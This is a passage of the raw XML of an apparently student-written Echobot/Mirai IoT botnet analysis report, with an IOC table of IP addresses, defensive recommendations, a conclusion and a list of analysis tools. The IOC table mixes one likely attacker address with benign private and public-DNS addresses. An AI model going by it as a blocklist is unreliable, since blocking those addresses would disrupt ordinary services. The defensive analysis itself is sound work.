            </w:pPr>
            <w:hyperlink r:id="rId27" w:history="1">
              <w:r w:rsidR="00E70AFD" w:rsidRPr="003B5BC6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>http://www.target.com</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E70AFD" w14:paraId="792B23BD" w14:textId="77777777" w:rsidTr="009E585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7F550D7" w14:textId="3B643CB4" w:rsidR="00E70AFD" w:rsidRDefault="00C97199" w:rsidP="009E585D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId28" w:history="1">
              <w:r w:rsidR="00E70AFD" w:rsidRPr="003B5BC6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>http://vmware.com</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E70AFD" w14:paraId="5C7470D7" w14:textId="77777777" w:rsidTr="009E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471CA8E" w14:textId="78D1CBB0" w:rsidR="00E70AFD" w:rsidRDefault="00C97199" w:rsidP="009E585D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId29" w:history="1">
              <w:r w:rsidR="00E70AFD" w:rsidRPr="003B5BC6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>http://schemas.xmlsoap.org</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C9F674E" w14:textId="2DD52AB4" w:rsidR="00116B3E" w:rsidRDefault="00116B3E" w:rsidP="00116B3E"/>
    <w:p w14:paraId="65D4153A" w14:textId="143F4A1C" w:rsidR="00E70AFD" w:rsidRDefault="00E70AFD" w:rsidP="00116B3E"/>
    <w:p w14:paraId="7A700B01" w14:textId="3EF60EF1" w:rsidR="00E70AFD" w:rsidRDefault="00E70AFD" w:rsidP="00116B3E"/>
    <w:p w14:paraId="00A80288" w14:textId="4875B9C1" w:rsidR="00E70AFD" w:rsidRDefault="00E70AFD" w:rsidP="00116B3E"/>
    <w:p w14:paraId="6763EA3E" w14:textId="7A18E732" w:rsidR="00E70AFD" w:rsidRDefault="00E70AFD" w:rsidP="00116B3E"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent1"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpXSpec="center" w:tblpY="128"/>
        <w:tblW w:w="8075" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8075"/>
      </w:tblGrid>
      <w:tr w:rsidR="00076BFF" w14:paraId="4D192516" w14:textId="77777777" w:rsidTr="00F4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D4DCF5F" w14:textId="7453E489" w:rsidR="00076BFF" w:rsidRDefault="00076BFF" w:rsidP="00F476D0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>IP</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> IOC’s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00076BFF" w14:paraId="08DC6376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8B091F6" w14:textId="4B64CA20" w:rsidR="00076BFF" w:rsidRPr="00F71DCF" w:rsidRDefault="00076BFF" w:rsidP="00F476D0">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>80.82.67.184</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00076BFF" w14:paraId="4721EB3F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D001492" w14:textId="7BE80C6C" w:rsidR="00076BFF" w:rsidRDefault="00076BFF" w:rsidP="00F476D0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>192.168.0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00076BFF" w14:paraId="02677019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8EFCBB9" w14:textId="482FF833" w:rsidR="00076BFF" w:rsidRDefault="00076BFF" w:rsidP="00F476D0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>192.168.1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00076BFF" w14:paraId="38330999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EFF036C" w14:textId="059F673D" w:rsidR="00076BFF" w:rsidRDefault="00076BFF" w:rsidP="00F476D0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>1.1.2.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00076BFF" w14:paraId="68E192EB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350ABF5" w14:textId="6C63A786" w:rsidR="00076BFF" w:rsidRDefault="00076BFF" w:rsidP="00F476D0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>3.0.0.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00076BFF" w14:paraId="300AA02D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FAC4CCA" w14:textId="5F30CAAD" w:rsidR="00076BFF" w:rsidRDefault="00076BFF" w:rsidP="00F476D0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>239.255.255.250</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00076BFF" w14:paraId="70F7545E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225D8B5" w14:textId="0B32C668" w:rsidR="00076BFF" w:rsidRDefault="00076BFF" w:rsidP="00F476D0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">10.8.28.133: </w:t>
            </w:r>
            <w:r w:rsidRPr="00076BFF">
              <w:t>49152</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00076BFF" w14:paraId="5D57C523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042CA4D" w14:textId="50B5C3A9" w:rsidR="00076BFF" w:rsidRDefault="00076BFF" w:rsidP="00F476D0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>1.3.6.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00076BFF" w14:paraId="240632E7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24BE112" w14:textId="32626C2E" w:rsidR="00076BFF" w:rsidRDefault="00076BFF" w:rsidP="00F476D0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>201.1.1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00076BFF" w14:paraId="1C08A591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C6AE60F" w14:textId="12DD333F" w:rsidR="00076BFF" w:rsidRDefault="00076BFF" w:rsidP="00F476D0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>1.1.1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00076BFF" w14:paraId="474E270C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A9A94DF" w14:textId="6C3F4B96" w:rsidR="00076BFF" w:rsidRDefault="00076BFF" w:rsidP="00F476D0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>127.0.0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00076BFF" w14:paraId="14E7E95F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5F8CD46" w14:textId="06892783" w:rsidR="00076BFF" w:rsidRDefault="00076BFF" w:rsidP="00F476D0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>8.8.8.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00076BFF" w14:paraId="3DA76F5A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FB5D489" w14:textId="42E739A2" w:rsidR="00076BFF" w:rsidRDefault="00076BFF" w:rsidP="00F476D0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>8.8.4.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00076BFF" w14:paraId="6BFE9A4C" w14:textId="77777777" w:rsidTr="00F476D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D5B209A" w14:textId="7EE2E3E0" w:rsidR="00076BFF" w:rsidRDefault="00076BFF" w:rsidP="00F476D0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>10.0.0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00076BFF" w14:paraId="128681EB" w14:textId="77777777" w:rsidTr="00F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263321E" w14:textId="7858B12D" w:rsidR="00076BFF" w:rsidRDefault="00076BFF" w:rsidP="00F476D0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>10.0.75.122</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="20230496" w14:textId="506E1569" w:rsidR="005A1D32" w:rsidRDefault="005A1D32" w:rsidP="00116B3E"/>
    <w:p w14:paraId="2A383BA1" w14:textId="4A546B33" w:rsidR="0043779E" w:rsidRDefault="0043779E" w:rsidP="00116B3E"/>
    <w:p w14:paraId="23A169F5" w14:textId="77777777" w:rsidR="0043779E" w:rsidRPr="00C80576" w:rsidRDefault="0043779E" w:rsidP="00116B3E"/>
    <w:p w14:paraId="2BF0BE46" w14:textId="100873ED" w:rsidR="00BF6A60" w:rsidRDefault="00BF6A60" w:rsidP="00BF6A60">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc101201921"/>
      <w:r>
        <w:t>Anti-reversing techniques</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="1F091D74" w14:textId="23A5ABB9" w:rsidR="00876747" w:rsidRDefault="009E585D" w:rsidP="00507E4E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>TB</w:t>
      </w:r>
      <w:r w:rsidR="0005685F">
        <w:t>C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A29184B" w14:textId="2B5F3429" w:rsidR="0097163D" w:rsidRDefault="0097163D" w:rsidP="00BF6A60"/>
    <w:p w14:paraId="7E60C1B0" w14:textId="60F37100" w:rsidR="000C6499" w:rsidRDefault="000C6499" w:rsidP="00BF6A60"/>
    <w:p w14:paraId="7642F4C6" w14:textId="77777777" w:rsidR="000C6499" w:rsidRDefault="000C6499" w:rsidP="00BF6A60"/>
    <w:p w14:paraId="21C0C107" w14:textId="1A10D839" w:rsidR="00D10983" w:rsidRDefault="00BE0373" w:rsidP="00D10983">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc101201922"/>
      <w:r w:rsidRPr="00BE0373">
        <w:t>Recommended Actions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="1343BECD" w14:textId="4992641D" w:rsidR="00D10983" w:rsidRDefault="005E687F" w:rsidP="00D10983">
      <w:r>
        <w:t>Although it is impractical to manually block and react to most IoT botnet attacks</w:t>
      </w:r>
      <w:r w:rsidR="000C6499">
        <w:t xml:space="preserve"> since most botnet variants use well-known exploits to attack and compromise</w:t>
      </w:r>
      <w:r w:rsidR="00C10419">
        <w:t xml:space="preserve"> vulnerable outdated IoT devices</w:t>
      </w:r>
      <w:r>
        <w:t>, we can still try to prevent and mitigate</w:t>
      </w:r>
      <w:r w:rsidR="000C6499">
        <w:t xml:space="preserve"> the chance of</w:t>
      </w:r>
      <w:r w:rsidR="00C10419">
        <w:t xml:space="preserve"> our own</w:t>
      </w:r>
      <w:r w:rsidR="000C6499">
        <w:t xml:space="preserve"> IoT devices being infected</w:t>
      </w:r>
      <w:r w:rsidR="00C10419">
        <w:t>. We can do this by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B39E02E" w14:textId="5D7EC19A" w:rsidR="004A13D2" w:rsidRDefault="00C10419" w:rsidP="00C10419">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Updat</w:t>
      </w:r>
      <w:r w:rsidR="008E037E">
        <w:t>ing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IoT device firmware/software regularly</w:t>
      </w:r>
      <w:r w:rsidR="004A13D2">
        <w:t xml:space="preserve">. Many Botnet variants infect IoT devices </w:t>
      </w:r>
      <w:r w:rsidR="00051CD0">
        <w:t>that are unpatched.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10177884" w14:textId="46E657FB" w:rsidR="00C10419" w:rsidRDefault="004A13D2" w:rsidP="00C10419">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00C10419">
        <w:t>ake sure access credentials</w:t>
      </w:r>
      <w:r w:rsidR="00B26B6C">
        <w:t xml:space="preserve"> for our own IoT devices</w:t>
      </w:r>
      <w:r w:rsidR="00C10419">
        <w:t xml:space="preserve"> are </w:t>
      </w:r>
      <w:r>
        <w:t>not default and are hardened to stop dictionary and brute force attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA3360E" w14:textId="3861AE83" w:rsidR="004A13D2" w:rsidRPr="00D10983" w:rsidRDefault="004A13D2" w:rsidP="00C10419">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Disable and stop using outdated </w:t>
      </w:r>
      <w:r w:rsidR="00725107">
        <w:t>IoT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> devices and equipment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B48E6B5" w14:textId="28F78C77" w:rsidR="00D37A0B" w:rsidRDefault="00EF3BB8" w:rsidP="00D37A0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>If you have a</w:t>
      </w:r>
      <w:r w:rsidR="008E037E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>router, configure router settings to detect and deter intrusions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CB7460" w14:textId="6A96B760" w:rsidR="00D37A0B" w:rsidRDefault="008E037E" w:rsidP="00D37A0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Make sure IoT devices auto-update whenever possible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3305BB76" w14:textId="1C5467E0" w:rsidR="008E037E" w:rsidRDefault="008E037E" w:rsidP="00D37A0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use legitimate network IoT devices from trusted companies and stores</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3C52DA" w14:textId="04D7489F" w:rsidR="00D37A0B" w:rsidRDefault="006D18C9" w:rsidP="00D37A0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Make sure IoT device traffic are encrypted when possible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8DCE10" w14:textId="03F0BA02" w:rsidR="003D7C34" w:rsidRDefault="00122E7F" w:rsidP="00122E7F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc101201923"/>
      <w:r w:rsidRPr="00122E7F">
        <w:t>CONCLUSION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="1F84C288" w14:textId="5D8013EC" w:rsidR="00122E7F" w:rsidRDefault="00D91614" w:rsidP="00122E7F">
      <w:r>
        <w:t>Echobot</w:t>
      </w:r>
      <w:r w:rsidR="0044631F">
        <w:t xml:space="preserve">, a successor to Mirai, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is a malicious malware that </w:t>
      </w:r>
      <w:r w:rsidR="0044631F">
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> infect multiple IoT devices</w:t>
      </w:r>
      <w:r w:rsidR="007B71F3">
        <w:t xml:space="preserve"> and transform </w:t>
      </w:r>
      <w:r w:rsidR="00886145">
        <w:t>devices</w:t>
      </w:r>
      <w:r w:rsidR="007B71F3">
        <w:t xml:space="preserve"> into bots </w:t>
      </w:r>
      <w:r w:rsidR="00886145">
        <w:t>that can be</w:t>
      </w:r>
      <w:r w:rsidR="007B71F3">
        <w:t xml:space="preserve"> controlled in a</w:t>
      </w:r>
      <w:r w:rsidR="00886145">
        <w:t>n attacker’s</w:t>
      </w:r>
      <w:r w:rsidR="007B71F3">
        <w:t xml:space="preserve"> botnet to perform largescale DDoS attacks</w:t>
      </w:r>
      <w:r w:rsidR="00470902">
        <w:t xml:space="preserve"> to disrupt services</w:t>
      </w:r>
      <w:r w:rsidR="0044631F">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6422B35F" w14:textId="15871EFC" w:rsidR="0044631F" w:rsidRDefault="00D86113" w:rsidP="00122E7F">
      <w:r>
        <w:t xml:space="preserve">Echobot </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>is able to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0044631F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00363676">
        <w:t>scan</w:t>
      </w:r>
      <w:r w:rsidR="0044631F">
        <w:t xml:space="preserve"> for new IoT devices to infect</w:t>
      </w:r>
      <w:r w:rsidR="00363676">
        <w:t xml:space="preserve"> including routers, wireless IP cameras, NAS devices, cloud platforms, firewalls and much more by targeting new and old unpatched vulnerabilities in firmware.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A leap from the default Mirai which used default credentials to spread to other infected devices.</w:t>
      </w:r>
      <w:r w:rsidR="00363676">
        <w:t xml:space="preserve"> With </w:t>
      </w:r>
      <w:r w:rsidR="001A6D11">
        <w:t>the Mirai source code being released</w:t>
      </w:r>
      <w:r w:rsidR="00187E65">
        <w:t xml:space="preserve"> in 2016</w:t>
      </w:r>
      <w:r w:rsidR="001A6D11">
        <w:t>, it is without a doubt that the IoT security landscape has</w:t>
      </w:r>
      <w:r w:rsidR="003F6025">
        <w:t xml:space="preserve"> changed dramatically and has</w:t>
      </w:r>
      <w:r w:rsidR="001A6D11">
        <w:t xml:space="preserve"> inspired new attacks and new threat actors to evolve </w:t>
      </w:r>
      <w:r w:rsidR="003F6025">
        <w:t>their</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> techniques</w:t>
      </w:r>
      <w:r w:rsidR="005A71B2">
        <w:t xml:space="preserve"> and malware</w:t>
      </w:r>
      <w:r w:rsidR="003F6025">
        <w:t xml:space="preserve"> to be a more serious threat to organizations</w:t>
      </w:r>
      <w:r w:rsidR="00187E65">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F0BE53" w14:textId="5FEF13CB" w:rsidR="00342E9E" w:rsidRDefault="00187E65" w:rsidP="00122E7F">
      <w:r>
        <w:t xml:space="preserve">We believe that the IoT Malware development scene will only continue to evolve and may become a larger problem </w:t>
      </w:r>
      <w:r w:rsidR="00470902">
        <w:t xml:space="preserve">in the future </w:t>
      </w:r>
      <w:r w:rsidR="00342E9E">
        <w:t xml:space="preserve">when the potential of </w:t>
      </w:r>
      <w:r w:rsidR="00C629F8">
        <w:t>IoT</w:t>
      </w:r>
      <w:r w:rsidR="00342E9E">
        <w:t xml:space="preserve"> attacks become more realized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B82894" w14:textId="2A4FA5CA" w:rsidR="00187E65" w:rsidRPr="00122E7F" w:rsidRDefault="00342E9E" w:rsidP="00122E7F">
      <w:r>
        <w:t xml:space="preserve">Thanks for reading! </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DEBF48" w14:textId="5A81936A" w:rsidR="00BE0373" w:rsidRDefault="00BE0373" w:rsidP="00BE0373">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc101201924"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>appendix</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="201ED943" w14:textId="6D6273BE" w:rsidR="00BE0373" w:rsidRDefault="00BE0373" w:rsidP="00BE0373">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc101201925"/>
      <w:r w:rsidRPr="00BE0373">
        <w:t>Indicators Of Compromise</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="542856EF" w14:textId="63B33EB8" w:rsidR="00E3057A" w:rsidRDefault="005A1D32" w:rsidP="00E00714">
      <w:r>
        <w:t>A following list of IP addresses that were used in the Echobot botnet</w:t>
      </w:r>
      <w:r w:rsidR="007822A9">
        <w:t xml:space="preserve"> which we captured in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007822A9">
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00177213">
        <w:t xml:space="preserve"> are listed </w:t>
      </w:r>
      <w:r w:rsidR="007822A9">
        <w:t>in the link below</w:t>
      </w:r>
      <w:r w:rsidR="00177213">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="007822A9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidR="0074392C" w:rsidRPr="005244CC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/Adumbrati0n/Mirai-Case-Study/blob/main/IPHostBruteForce.txt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0074392C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00177213">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731EE849" w14:textId="472B51ED" w:rsidR="00B71F94" w:rsidRDefault="00B71F94" w:rsidP="00B71F94">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc101201926"/>
      <w:r>
        <w:t>Tools used</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="4D2F9EF7" w14:textId="634ED9D2" w:rsidR="00421C49" w:rsidRDefault="00B71F94" w:rsidP="00B71F94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ghidra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BA5271">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidR="00BA5271" w:rsidRPr="005244CC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://ghidra-sre.org/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00BA5271">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301AF533" w14:textId="1AD31713" w:rsidR="00421C49" w:rsidRDefault="00421C49" w:rsidP="00B71F94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00B71F94">
        <w:t>inutils</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BA5271">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidR="00BA5271" w:rsidRPr="005244CC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.gnu.org/software/binutils/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00BA5271">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104DAEA7" w14:textId="1BD4B954" w:rsidR="00421C49" w:rsidRDefault="00421C49" w:rsidP="00B71F94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00B71F94">
        <w:t>trace</w:t>
      </w:r>
      <w:r w:rsidR="00BA5271">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidR="00BA5271" w:rsidRPr="005244CC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://strace.io/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00BA5271">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38613255" w14:textId="7EEA5CAE" w:rsidR="00421C49" w:rsidRDefault="00421C49" w:rsidP="00B71F94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Z</w:t>
      </w:r>
      <w:r w:rsidR="00B71F94">
        <w:t>elos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BC25E9">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidR="00BC25E9" w:rsidRPr="005244CC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/zeropointdynamics/zelos</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00BC25E9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257FC51B" w14:textId="6F2EC36E" w:rsidR="00421C49" w:rsidRDefault="00421C49" w:rsidP="00B71F94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00B71F94">
        <w:t>ireshark</w:t>
      </w:r>
      <w:r w:rsidR="00BC25E9">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:hyperlink r:id="rId35" w:history="1">
        <w:r w:rsidR="00BC25E9" w:rsidRPr="005244CC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.wireshark.org/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00BC25E9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B911F6B" w14:textId="257BBEED" w:rsidR="00B71F94" w:rsidRDefault="00421C49" w:rsidP="00B71F94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Docker/Qemu/BuildRoot2 – Dynamic Analyzer</w:t>
      </w:r>
      <w:r w:rsidR="00EC40AE">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:hyperlink r:id="rId36" w:history="1">
        <w:r w:rsidR="00EC40AE" w:rsidRPr="005244CC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
